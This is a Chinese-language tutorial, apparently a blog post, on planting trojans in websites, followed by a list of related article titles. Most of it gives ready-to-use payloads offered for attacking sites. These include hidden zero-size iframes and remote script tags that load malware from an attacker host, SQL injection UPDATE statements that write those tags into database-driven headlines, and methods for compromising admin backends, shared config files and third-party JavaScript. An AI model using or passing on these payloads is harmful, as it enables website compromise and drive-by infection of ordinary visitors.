只要不破坏原有的语言逻辑,那就想插入哪里就写哪里了,最基本的语句当然是<iframe src=http://www.fucksb.net/mm.htm width=0 height=0></iframe>,其中 http://www.fucksb.net/mm.htm是我们的木马,下面就不一个一个提示了。

  上面可能是一般的挂马方式,也是初学者的玩法,好了,再说深一点点的,那就是js文件,好多网站上,你查看源代码都会调用js文件,其中的语句为<script language=**** src=./ad/ad.js></script>,想到了什么,这里也可以挂马,其中我们可以远程调用自己的js,比如:<script language=**** src=http://www.fucksb.net/mm.js></script>这个mm.js就可以写木马了,怎么写呢,同样,我们还用最基本的iframe框架,不过在<script></script>之中可识别语言不是html,那怎么办呢,follow me,js文件可以这样写ocument.write("<iframe <iframe src=http://www.fucksb.net/mm.htm width=0 height=0></iframe>");,这种形势,这时就可以执行此js中的代码了,当然了,说白了,其实全语句就是<script language=****>document.write("<iframe <iframe src=http://www.fucksb.net/mm.htm width=0 height=0></iframe>")</script>呵呵。。

  聪明的你可能发现了一点,好像不止是js文件哦~,只要在<script></script>之中,无论什么后缀的文件,只要里面写的语句可以被****识别就会执行,对的,比如<script src=http://www.fucksb.net/mm.test></script>,又如<script src=http://www.fucksb.net/mm.lala></script>管他的后缀是什么,只要里面写的语句正确就会被执行了。

同样,如果首页调用其它网站,或者次级目录中的htm,asp等如:<iframe src=./ad/news.htm width=300 height=200></iframe>
也可以在news.htm文件里挂马,可以是htm和js,随便哪种,这是比较隐蔽的玩法,这些适用于主页没有写权限的方法。

  <script>同<iframe>2个相比较,好处是script整体挂马的代码长度比iframe小得多,很实用。说实用是在数据库方面,下面介绍。

数据库挂马,这里我们拿mssql数据库为例子。

  这里说的是首页调用到的数据库,比如新闻,论坛,公告,等等,一般是标题。这些需要经验去检测,举个例子,比如首页有一条新闻为:“明日开业”,那么鼠标点此新闻,地址栏打开的新窗口为news.asp?id=1,这种情况,这时,就可以判断此新闻是从数据库中调用的了,当然了,我们不说access,只说mssql。
  首页,我们要有这个网站中的一个注入点,比如就点在vote.asp?id=123,同时,至少是Db_owner权限,这时如果要挂马可以不用取到webshell,因为如果我们的目的只在于挂马的话,而且有时,还得检测mssql数据库和web服务器不在同一个机器上,那挂马的方式就是更改数据库内容,这里我说的就是这种,如上面说的,首页显示的一条新闻标题为“明日开业”,如果首页显示的标题是“明日开业</a><iframe src=http://www.fucksb.net/mm.htm width=0 height=0></iframe>”,那这样的话,首页就会执行这段代码了,像这种情况,找到了注入点,就得找表名,如此新闻的表名为news,字段为title,id,等等,根据猜测,id=1时,暴出的字段title的值就为“明日开业”,那么90%就可以猜到了,首页调用的数据库的字段就为news表中的title,这时在注入点,可以大胆提交vote.asp?id=123;update news set title='明日开业</a><iframe src=http://www.fucksb.net/mm.htm width=0 height=0></iframe>' where id=1;--,这样就可以更改数据库了,前提是最少要少db_owner权限,当然也有时由于代码原因,也可以这样提交:vote.asp?id=123';update news set title='明日开业</a><ifrmae src=http://www.fucksb.net/mm.htm width=0 height=0></iframe>' where id=1 and '1'='1,也可以...
  这种方法是有问题的,实战中存在不少问题,因为一般的情况下,标题都是通过<table>来限制宽度,也就是说如果你的标题的长度超过了指定的长度,那么你的代码只能写一半,这样就不能执行了,所以挂马最好的方法是用<script>这种方法来挂马了,如:
vote.asp?id=123;update news set title='明日开业</a><script src=http://www.fucksb.net/mm.js></script>' where id=1;--长度有很大的减少,很不错。

后台挂马
通常注入等不到webshell,就只能靠进后台挂马。

这里说的是进入了后台,但不能通过后台得到webshell,这时要仔细关察后台,像比较网站的链接、顶部底部的广告、都可以直接写入你的木马代码,等等,后台是灵活的,具体问题具体分析。不过有一点很重要,是不要打乱前台htm源文件里的代码逻辑,比如应该闭合前面的<a><img>"( 等这些符号,应该先闭合掉如</a></img>")。

其它形式

如一首页调用了<iframe src=vote.asp?id=1&no=view width=100></iframe>此种形势,一样可以在vote.asp中直接写入iframe木马代码,如果调用的是<script src=vote.asp?id=1&no=view width=100></script>在vote.asp写代码时,请用document.write("")这种格式写入,当然,如果被挂文件中还有调用的文件可以继续往深处写,如果你够狠的话,直接写到数据库配置文件中,如conn.asp,这样好多页面可以同时挂上你的一种木马了。
当然这里也有js文件,一样原理。
挂一个网站的马,不一定就得攻入他,有时没有方法的同时,可以考虑跨站。好多站用了别的站的js文件,如:<script src=http://www.163.com/user.js>这种情势,这时就可以考虑只拿163.com的权限就行了,只要能修改到user.js文件就可以挂到你要挂的站点了,同理,也有<iframe src=http://www.163.com/user.htm>此种情况,一样道理,剑走偏锋,达到目的,无论用什么招数了。

服务器挂马
这里简单说一个比较狠的吧.
重定向任何调用的htm,js,等文件,只要是执行的

各种网站挂马的代码和原理相关推荐

  1. qqsafe病毒 arp网站挂马 原理剖析-786ts.qqsafe-qqservicesyydswfhuw8ysjftwf.org(转载)

    昨天小站被挂马了,每次打开都会自动弹出一个对话框,提示正准备安装...,然后就消失.查看页面的源文件会发现在代码的最后面被加上了9 ~0 ]* U9 N2 ^ <body>" z ...

  2. 金山安全报告:二月漏洞频出 网站挂马猖獗

    赚足眼球的"猫癣" 一款早在春节之前就已经发出预警的病毒,在大假结束后还是席卷了国内网络,无论称呼"猫癣"还是"犇牛",被电脑用户们牢牢记住 ...

  3. BT天堂网站挂马事件后续:“大灰狼”远控木马分析及幕后真凶调查

    9月初安全团队披露bt天堂网站挂马事件,该网站被利用IE神洞CVE-2014-6332挂马,如果用户没有打补丁或开启安全软件防护,电脑会自动下载执行大灰狼远控木马程序. 鉴于bt天堂电影下载网站访问量 ...

  4. 某可人官方网站挂马Trojan-PSW.Win32.OnLineGames.sbg

    某可人官方网站挂马Trojan-PSW.Win32.OnLineGames.sbg endurer 原创 2008-02-29 第1版 1.网站首页包含代码: /--- <iframe src= ...

  5. 网站挂马危害及其防御措施

    网页挂马是攻击者通过在正常的页面中(通常是网站的主页)插入一段代码.浏览者在打开该页面的时候,这段代码被执行,然后下载并运行某木马的服务器端程序,进而控制浏览者的主机.通俗点说就是将网页木马这样的攻击 ...

  6. 检测网站挂马程序(Python)

    系统管理员通常从svn/git中检索代码,部署站点后通常首先会生成该站点所有文件的MD5值,如果上线后网站页面内容被篡改(如挂马)等,可以比对之前生成MD5值快速查找去那些文件被更改,为了使系统管理员 ...

  7. 全国知名高校网站挂马现象严重 考生面临安全风险

    据瑞星"云安全"系统监测,6月18日,"湖北工业大学"."哈尔滨理工大学"."武汉理工大学"等全国知名理工类高校网站被黑 ...

  8. 《越狱》完结 米帅迷应小心纹身网站挂马

    据瑞星"云安全"系统监测,5月18日是世界博物馆日,"中国书画苑"."今日艺术网"."中国艺术品在线"等网站被黑客挂马, ...

  9. 2010.1.26网站挂马播报

    今天共监测到9个网站被挂马,149个挂马链接,为了防止误点击,把地址稍微做了处理. 以下为挂马网站: h11p://www.cdldbz.gov.cn h11p://www.cfl.cqu.edu.c ...

最新文章

  1. Secondary NameNode:它究竟有什么作用?(转自:http://blog.csdn.net/xh16319/article/details/31375197)
  2. Post请求和get请求乱码方式解决
  3. 【LeetCode刷题记录】LeetCode经典题目数组求和及哈希表的使用!
  4. OSG仿真案例(2)
  5. scala闭包 变量_Scala闭包,自由和绑定变量,匿名函数
  6. pyRedis - 操作指南:增/删/改/查、管道与发布订阅功能
  7. the 1st one
  8. 如何查看mysql的sql语句索引_mysql 查看sql语句索引情况 详解explain
  9. Ubuntu18.04 下的Gif录制工具
  10. matlab 图像中加入高斯白噪声,matlab – 使用imnoise为图像添加高斯噪声
  11. java循环遍历map集合_Java中遍历Map集合的四种方法
  12. 多功能雨伞项目计划书_雨伞策划书范文
  13. 人像图片Relight
  14. 5G套餐打七折, 购机再现补贴“大战”
  15. 数据帮助企业决策案例_大数据可以如何帮助您的企业
  16. 汽车租赁小程序来了,汽车租赁小程序开发方案
  17. 用matlab解方程组例子,Matlab求解超定方程组实例
  18. 企业如何与客户建立良好的客户关系
  19. 娶个日本女人做老婆是怎样一种体验
  20. 『IDEA』IDEA快捷键使用教程

热门文章

  1. 一键关闭wi-fi蓝牙捷径_如何在Windows中使用键盘或桌面快捷方式打开或关闭Wi-Fi...
  2. python 栈实现 加减乘除_Python自学笔记,编程中简单的加减乘除
  3. “吃鸡”外挂黑产上亿,游戏行业如何做好防御?
  4. Nginx反向代理,通过域名直接访问指定的端口,比如8080
  5. 画论07 僧彦悰《後画录》
  6. java基础总结二--让大学生活不再迷茫
  7. MongoDB数据库基本操作
  8. 【Hardware】【手机震动马达】
  9. Wannafly挑战赛26
  10. ping包测试内容写入文件,并使用python对相应的结果进行统计分析